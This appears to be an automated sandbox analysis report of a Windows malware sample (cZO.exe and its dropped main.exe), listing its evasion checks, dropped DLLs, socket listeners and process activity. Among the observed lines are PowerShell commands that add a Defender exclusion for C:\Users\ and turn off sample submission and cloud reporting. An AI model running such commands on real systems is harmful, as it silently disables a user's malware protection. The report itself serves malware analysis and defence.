Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8B9185728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BA4F2BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BFB31D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BFB52CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BFB82278
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FF8B9152BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FF8B9185728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FF8BA502BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FF8BFB31D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FF8BFB52CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FF8BFB82278
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6454Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3298Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7521Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2066Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7569Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2055Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeWindow / User API: threadDelayed 1480
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeWindow / User API: threadDelayed 2649
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\GEGgzh0sJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\XpOp833vJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\I77yQ5inJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\o6oDuAJlJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\EgwqOk24Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\OwuZZod2Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\YXkdIYk6Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\YkhL6rehJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\GmdNT1ANJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_22-61680
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-10282
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeAPI coverage: 1.5 %
Source: C:\Users\user\Desktop\cZO.exe TID: 6716 | Thread sleep time: -18600000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 | Thread sleep count: 6454 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 | Thread sleep count: 3298 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828 | Thread sleep count: 7521 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552 | Thread sleep count: 2066 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1600 | Thread sleep count: 7569 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380 | Thread sleep count: 2055 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1536 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3836 | Thread sleep count: 155 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3836 | Thread sleep time: -77500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5352 | Thread sleep count: 130 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5352 | Thread sleep time: -65000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5276 | Thread sleep count: 1480 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5276 | Thread sleep time: -4440000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1524 | Thread sleep count: 45 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5276 | Thread sleep count: 2649 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5276 | Thread sleep time: -7947000s >= -30000s
Source: C:\Users\user\Desktop\cZO.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\Desktop\cZO.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\Desktop\cZO.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\cZO.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\cZO.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | Code function: 6_2_00007FF775723DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,6_2_00007FF775723DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF6BE031CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF6BE031CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BA4F4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BA4F4013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFB331F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB331F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB857B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BA504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BA504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BFB331F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB331F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB857B3
Source: C:\Users\user\Desktop\cZO.exe | Thread delayed: delay time: 120000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: main.exe, 00000020.00000002.3261486868.00000270D3738000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm3
Source: svchost.exe, 0000001F.00000002.3263426432.000001D379836000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
Source: svchost.exe, 0000001F.00000002.3262697506.000001D378AC7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263371493.000001D379800000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: main.exe, 00000016.00000002.3154747003.000002234F1D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510794984.0000021015F04000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: cZO.exe, 00000001.00000002.3262302177.0000000000911000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2456376658.000002234F1DD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\cZO.exe | Process information queried: ProcessInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | Code function: 6_2_00007FF77572FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,6_2_00007FF77572FF1F
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | Code function: 6_2_00007FF7757245D5 fopen,_fsopen,fseek,_errno,_errno,_errno,_errno,_errno,_errno,_errno,_errno,ftell,_errno,_errno,_errno,_errno,fseek,fread,_errno,_errno,_errno,_errno,GetProcessHeap,HeapAlloc,_errno,_errno,_errno,_errno,GetProcessHeap,HeapFree,fclose,6_2_00007FF7757245D5
Source: C:\Users\user\Desktop\cZO.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | Code function: 6_2_00007FF775721131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,6_2_00007FF775721131
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | Code function: 6_2_00007FF77573B6B8 QueryFullProcessImageNameW,SetFileAttributesA,SetUnhandledExceptionFilter,TlsGetValue,VirtualProtect,6_2_00007FF77573B6B8
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | Code function: 6_2_00007FF77573B668 IsDBCSLeadByteEx,OpenProcess,QueryFullProcessImageNameW,SetFileAttributesA,SetUnhandledExceptionFilter,TlsGetValue,VirtualProtect,WideCharToMultiByte,6_2_00007FF77573B668
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | Code function: 6_2_00007FF7757305D9 SetUnhandledExceptionFilter,6_2_00007FF7757305D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF6BE031131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,22_2_00007FF6BE031131

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Users\user\Desktop\cZO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | Code function: 6_2_00007FF77572292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,6_2_00007FF77572292E
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe | Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | Code function: 6_2_00007FF775726FD5 GetSystemTimeAsFileTime,6_2_00007FF775726FD5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B91538C3
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: vc71izwl68ub3txurufnpr09g6ni3.exe, 00000006.00000002.2059689197.000001EFE9AD8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B91709A8 listen,22_2_00007FF8B91709A8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B915240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8B915240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B915E549 listen,22_2_00007FF8B915E549
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B91A3A00 listen,22_2_00007FF8B91A3A00
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B91901A9 listen,22_2_00007FF8B91901A9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B9184F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8B9184F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BA4F240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BA4F240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BA4FCC19 listen,22_2_00007FF8BA4FCC19
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BA50F900 listen,22_2_00007FF8BA50F900
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFB315FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB315FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFB4B820 listen,22_2_00007FF8BFB4B820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFB5254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB5254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFB6E900 listen,22_2_00007FF8BFB6E900
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFB8E2B9 listen,22_2_00007FF8BFB8E2B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFB81ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB81ADA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFBA0920 listen,22_2_00007FF8BFBA0920
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8B915240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8B915240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8B9184F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8B9184F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BA50240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8BA50240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BFB315FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8BFB315FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BFB5254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8BFB5254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BFB8E2B9 listen,32_2_00007FF8BFB8E2B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BFB81ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8BFB81ADA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BFBA0920 listen,32_2_00007FF8BFBA0920
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
